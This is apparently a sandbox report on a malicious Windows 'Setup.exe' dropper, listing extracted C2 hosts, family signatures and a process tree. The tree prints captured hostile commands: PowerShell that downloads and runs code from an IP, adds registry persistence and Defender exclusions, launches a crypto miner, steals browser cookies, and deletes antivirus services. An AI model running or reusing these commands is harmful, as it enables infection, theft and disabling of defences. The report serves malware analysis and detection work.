Resubmissions
04-06-2023 21:35
230604-1fcwgadg89 1013-02-2022 03:16
220213-dsq8asfbej 1013-02-2022 03:12
220213-dqagrsdda9 1013-02-2022 03:11
220213-dpxwnsfbdq 106-12-2021 20:39
211206-zflypsfahr 1019-10-2021 03:48
211019-ec1mgafbf7 1011-08-2021 05:28
210811-rjsxfvjxd2 1011-08-2021 05:07
210811-rs31ylg4ls 1011-08-2021 04:56
210811-tvaldfm4jx 10Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-08-2021 04:49
General
-
Target
Setup.exe
-
Size
1.6MB
-
MD5
ce6eaa52767b2df78b34519231966588
-
SHA1
ab32d09951189022a1a39e9204ec9ce2926b3fcf
-
SHA256
40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5
-
SHA512
36a09fe704823d6db5d0982d761ba1976c940b82b7c1ca650627d66e16b420612b78c761f2ed00e533453eeb2dd7e431cf47b0c2cf826354aa6e779fda531067
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
danabot
142.11.244.124:443
142.11.206.50:443
-
embedded_hash
6AD9FE4F9E491E785665E0D144F61DAB
Extracted
vidar
40
937
https://lenak513.tumblr.com/
-
profile_id
937
Extracted
metasploit
windows/single_exec
Extracted
vidar
40
921
https://lenak513.tumblr.com/
-
profile_id
921
Extracted
raccoon
c8a4bc819c641415a3c45622368953a684036cdb
-
url4cnc
https://telete.in/jjbadb0y
Signatures
-
Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
-
Danabot Loader Component 2 IoCs
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 2 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Raccoon Stealer Payload 2 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
-
suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 1 IoCs
-
Vidar Stealer 4 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 2 IoCs
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
-
NSIS installer 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
-
Suspicious use of WriteProcessMemory 58 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\j85DqwTK9sHk3hQwwS4aL5DJ.exe"C:\Users\Admin\Documents\j85DqwTK9sHk3hQwwS4aL5DJ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmp90E6_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp90E6_tmp.exe"3⤵
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Ogni.cab4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^kFkkCweteokIGxUGjOtmnesFfoGwECEIbjuYaFuyaLppmuaDjBQwmHGogFWzxwmADClxhWhHHYuNSiuoQrPrLC$" Mette.cab6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comSapete.exe.com L6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L7⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L8⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L10⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L11⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L12⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L13⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L14⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L15⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L17⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L18⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L19⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L20⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 306⤵
- Runs ping.exe
-
C:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exe"C:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exeC:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 14644⤵
- Program crash
-
C:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exeC:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exe3⤵
-
C:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exeC:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exe3⤵
-
C:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exeC:\Users\Admin\Documents\zCc2SEyYhU8AIcuwGGE9jeRr.exe3⤵
-
C:\Users\Admin\Documents\OTFAYQ3eYWojGhEaQmFTD8LI.exe"C:\Users\Admin\Documents\OTFAYQ3eYWojGhEaQmFTD8LI.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6131c36b-2744-4acf-82fa-983cbc3cb672\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\6131c36b-2744-4acf-82fa-983cbc3cb672\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6131c36b-2744-4acf-82fa-983cbc3cb672\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Users\Admin\AppData\Local\Temp\6131c36b-2744-4acf-82fa-983cbc3cb672\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\6131c36b-2744-4acf-82fa-983cbc3cb672\AdvancedRun.exe" /SpecialRun 4101d8 13884⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\OTFAYQ3eYWojGhEaQmFTD8LI.exe" -Force3⤵
-
C:\Users\Admin\Documents\OTFAYQ3eYWojGhEaQmFTD8LI.exe"C:\Users\Admin\Documents\OTFAYQ3eYWojGhEaQmFTD8LI.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\winsetupcom.exe"C:\Users\Admin\AppData\Local\Temp\winsetupcom.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.minexmr.com:4444 -u 44iQQ1yP3JMbnSdzoY3GzYUUfESrEGEfKakyhxt1FqjfcktWxXkhaGjEs96Y7jJfnEeHa37h4Cjf6cQgA8GzAaGnGPGgkxR -p x -k -v=0 --donate-level=1 -t 15⤵
-
C:\Users\Admin\Documents\mzldmRwzByh_nQqHtiGpdmtT.exe"C:\Users\Admin\Documents\mzldmRwzByh_nQqHtiGpdmtT.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
-
C:\Users\Admin\Documents\3cxskP5M6qQLrndsJIvMVgFo.exe"C:\Users\Admin\Documents\3cxskP5M6qQLrndsJIvMVgFo.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2100 -s 15483⤵
- Program crash
-
C:\Users\Admin\Documents\0VPJ7OvPF0QhMdTZQD8hebe_.exe"C:\Users\Admin\Documents\0VPJ7OvPF0QhMdTZQD8hebe_.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\mn425KBdONIGIr3iL3wJvq9j.exe"C:\Users\Admin\Documents\mn425KBdONIGIr3iL3wJvq9j.exe"2⤵
- Executes dropped EXE
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.2''+''41''+''.19.5''+''2/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add 